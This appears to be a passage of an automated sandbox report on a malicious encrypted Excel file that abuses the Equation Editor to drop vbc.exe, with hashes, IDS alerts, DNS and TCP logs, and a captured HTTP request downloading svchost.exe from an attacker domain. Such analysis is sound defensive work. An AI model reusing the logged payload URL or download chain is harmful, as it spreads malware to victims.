                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 935x300, frames 3
                                                    Category:dropped
                                                    Size (bytes):330271
                                                    Entropy (8bit):7.710378179204039
                                                    Encrypted:false
                                                    SSDEEP:6144:XCKIsPILDjoHJpc/qdtw23+c3sdMeqdnShOKpgXw8KkTdt+lM1U:XxQLDCJpc/o5+c6MvnYk9f5tne
                                                    MD5:FD07F12E2CB2C064A24D25510E2A3496
                                                    SHA1:B8D01E7C8E270C51B3A57768D3B66543F7E37E1D
                                                    SHA-256:DCC4160C26C10D0D9A6E4293494C3A5C794AF751879247809B9E215B80AAEC4F
                                                    SHA-512:BFDF689A254727DDD1A3EE86EDB757D2818DC12026C298224122D11F65FB62F350EBCE3A46BC6A256EE636BC791DF80FC96FEE2886B057E0C2D186A442BC5920
                                                    Malicious:false
                                                    Preview: ......JFIF.....,.,.....C....................................................................C.......................................................................,....!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.O...................u......-C.7.......J..K....K.Y.......Vi..&h.1..@=&......f.-.+x&.V.....4.>'.3j0]h..T.m...\k..4.0.GS..Y,,...X..]%..m........4......U...<f...,t.-n.....3ji...h...7...os......w...s..|M....[.|H...4}2.^.^.[..........Z..L....hWN......,.A..~#..Z..g.]......x.A.V..M.7K..E.....>...K.,z=..v..O..Z.....I.cx....xc.....7WW.W.Euiwi.^.Z.[N.,....
                                                    C:\Users\user\Desktop\~$MKDRPSJS9E999494993.xlsx
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):330
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                    Malicious:true
                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    C:\Users\Public\vbc.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):73728
                                                    Entropy (8bit):3.8027076963041346
                                                    Encrypted:false
                                                    SSDEEP:768:EltriQ4cyKU+NSpGGLgqHXRmf9l/h97Q:7vh+NSUGLtg9Bo
                                                    MD5:6CC6D1DD6CDD848693426A270563C921
                                                    SHA1:B7D970A91FD89E99C3533C22B14EA7B00258E011
                                                    SHA-256:7D0B3FE8AA36FCFFB72E5A7F03E60D8F1E0A5FC211D223B84D15706C3444D817
                                                    SHA-512:218FAD1CAF9FD03F3EBE1B6E2A5E2F3916EC37C2EDA0A99FFB816B359A7975E95B2F7DF8902BFC25F97D6ED9D532D05CE5CFACCB02E18760A2731C459F913809
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...x..P..................... ....................@.......................... ..............................................D...(...........................................................................(... ....................................text............................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:CDFV2 Encrypted
                                                    Entropy (8bit):7.996786972909979
                                                    TrID:
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                    File name:MKDRPSJS9E999494993.xlsx
                                                    File size:2663936
                                                    MD5:1a40446f940b183d3d94f0e31fc8560d
                                                    SHA1:5db0c0c8d1e079b5a2d5bc2858a55ff4498c3fb3
                                                    SHA256:adfefd8b289eecc823dc6d2b2f9acf6e5a4e49db2917af74d34354ac867c3235
                                                    SHA512:0cc4353d09d838d3b1ce9a23bd969df8c67ce03e6494534e5d3a431e70310d641a7bb8e56c7f83d378e649f0bcb199292763f00414c3e888f8f52c1aa339fec4
                                                    SSDEEP:49152:Pv/SYmfJU/Dto5qpVC8RRF0nqGtK2NlTD3eOBkDTKA8qnnn02vRv9EsBnfHxJP3s:fSYmfJC5oiT0nnBlHeOE8qnn02vj5pfQ
                                                    File Content Preview:........................>...................)....................................................................................................................................... ...!..."...#...$...%...&...'...(...z.......|.......~......................

                                                    File Icon

                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "MKDRPSJS9E999494993.xlsx"

                                                    Indicators

                                                    Has Summary Info:False
                                                    Application Name:unknown
                                                    Encrypted Document:True
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:False

                                                    Streams

                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                    General
                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                    File Type:data
                                                    Stream Size:64
                                                    Entropy:2.73637206947
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                    General
                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                    File Type:data
                                                    Stream Size:112
                                                    Entropy:2.7597816111
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                    General
                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                    File Type:data
                                                    Stream Size:200
                                                    Entropy:3.13335930328
                                                    Base64 Encoded:False
                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                    General
                                                    Stream Path:\x6DataSpaces/Version
                                                    File Type:data
                                                    Stream Size:76
                                                    Entropy:2.79079600998
                                                    Base64 Encoded:False
                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 2638920
                                                    General
                                                    Stream Path:EncryptedPackage
                                                    File Type:data
                                                    Stream Size:2638920
                                                    Entropy:7.99992439687
                                                    Base64 Encoded:True
                                                    Data ASCII:@ D ( . . . . . . . . . E . } % . . . . @ . . 7 . . [ . . . ; . = . . V i . . | . . z . . > . . . > . . a ) . . . . . T . . ? R . . . . . L . g . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . .
                                                    Data Raw:40 44 28 00 00 00 00 00 e0 eb cd 8f 45 91 7d 25 ce d6 05 a9 40 87 05 37 ed a0 5b 19 a5 98 3b 86 3d 86 18 56 69 9e 81 7c fa 8c 7a b4 c6 3e 84 d2 05 3e cf a3 61 29 af b8 fd e9 d5 54 e2 89 3f 52 d3 c2 ac 04 ea 4c c4 67 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc
                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                    General
                                                    Stream Path:EncryptionInfo
                                                    File Type:data
                                                    Stream Size:224
                                                    Entropy:4.59623944191
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 4 . . ) e . . V . . . . , . . W . j } . . . M . . 2 . = @ 7 . . . . . . . B . E * . m * . . f . . : . . < . ( . . . . D . . q . ] . .
                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    03/31/21-12:05:18.150258TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916680192.168.2.22103.141.138.118

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 31, 2021 12:05:17.211779118 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.259856939 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.259990931 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.273320913 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.321717978 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.325447083 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.325469971 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.325537920 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.327835083 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.337320089 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.385334015 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.387185097 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.387258053 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.648304939 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.696475983 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.790493011 CEST44349165172.67.83.132192.168.2.22
                                                    Mar 31, 2021 12:05:17.790781021 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:17.915817976 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.149513960 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.149710894 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.150258064 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.380635977 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.380701065 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.380733967 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.380764008 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.381023884 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.610848904 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.610904932 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.610935926 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.610939980 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.610968113 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.610974073 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.610985994 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.611010075 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.611016989 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.611041069 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.611053944 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.611073971 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.611078978 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.611107111 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.611118078 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.611143112 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.840740919 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840787888 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840816021 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840847969 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840877056 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840902090 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840929985 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840959072 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.840984106 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841012955 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841021061 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841039896 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841044903 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841073990 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841080904 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841104984 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841109991 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841131926 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841141939 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841160059 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841166019 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841187000 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:18.841193914 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841219902 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.841244936 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:18.844528913 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:19.070921898 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.070952892 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.070966005 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.070979118 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.070991039 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071003914 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071016073 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071028948 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071042061 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071058989 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071072102 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071084023 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071095943 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071111917 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071132898 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071151972 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071165085 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071177959 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071194887 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071208000 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071218967 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071230888 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071243048 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071254969 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071265936 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071278095 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071290970 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071300030 CEST8049166103.141.138.118192.168.2.22
                                                    Mar 31, 2021 12:05:19.071536064 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:19.071736097 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:19.076581001 CEST4916680192.168.2.22103.141.138.118
                                                    Mar 31, 2021 12:05:19.488250971 CEST49165443192.168.2.22172.67.83.132
                                                    Mar 31, 2021 12:05:19.488400936 CEST4916680192.168.2.22103.141.138.118

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 31, 2021 12:05:17.091434956 CEST5219753192.168.2.228.8.8.8
                                                    Mar 31, 2021 12:05:17.148865938 CEST53521978.8.8.8192.168.2.22
                                                    Mar 31, 2021 12:05:17.149233103 CEST5219753192.168.2.228.8.8.8
                                                    Mar 31, 2021 12:05:17.195324898 CEST53521978.8.8.8192.168.2.22
                                                    Mar 31, 2021 12:05:17.821394920 CEST5309953192.168.2.228.8.8.8
                                                    Mar 31, 2021 12:05:17.913506031 CEST53530998.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Mar 31, 2021 12:05:17.091434956 CEST192.168.2.228.8.8.80x6a02Standard query (0)is.gdA (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.149233103 CEST192.168.2.228.8.8.80x6a02Standard query (0)is.gdA (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.821394920 CEST192.168.2.228.8.8.80x2596Standard query (0)stdyworkfinetraistfh.dns.armyA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Mar 31, 2021 12:05:17.148865938 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.148865938 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.148865938 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.195324898 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.195324898 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.195324898 CEST8.8.8.8192.168.2.220x6a02No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                    Mar 31, 2021 12:05:17.913506031 CEST8.8.8.8192.168.2.220x2596No error (0)stdyworkfinetraistfh.dns.army103.141.138.118A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • stdyworkfinetraistfh.dns.army

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249166103.141.138.11880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 31, 2021 12:05:18.150258064 CEST6OUTGET /findoc/svchost.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Connection: Keep-Alive
                                                    Host: stdyworkfinetraistfh.dns.army
                                                    Mar 31, 2021 12:05:18.380635977 CEST7INHTTP/1.1 200 OK
                                                    Date: Wed, 31 Mar 2021 10:05:14 GMT
                                                    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
                                                    Last-Modified: Wed, 31 Mar 2021 00:01:16 GMT
                                                    ETag: "12000-5bec9d05b2f1c"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 73728
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 16 0d 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 20 00 00 00 00 00 00 08 12 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 06 00 06 00 04 00 00 00 00 00 00 00 00 20 01 00 00 10 00 00 a9 f5 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 ee 00 00 28 00 00 00 00 10 01 00 88 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 e1 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 0a 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 09 00 00 00 10 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
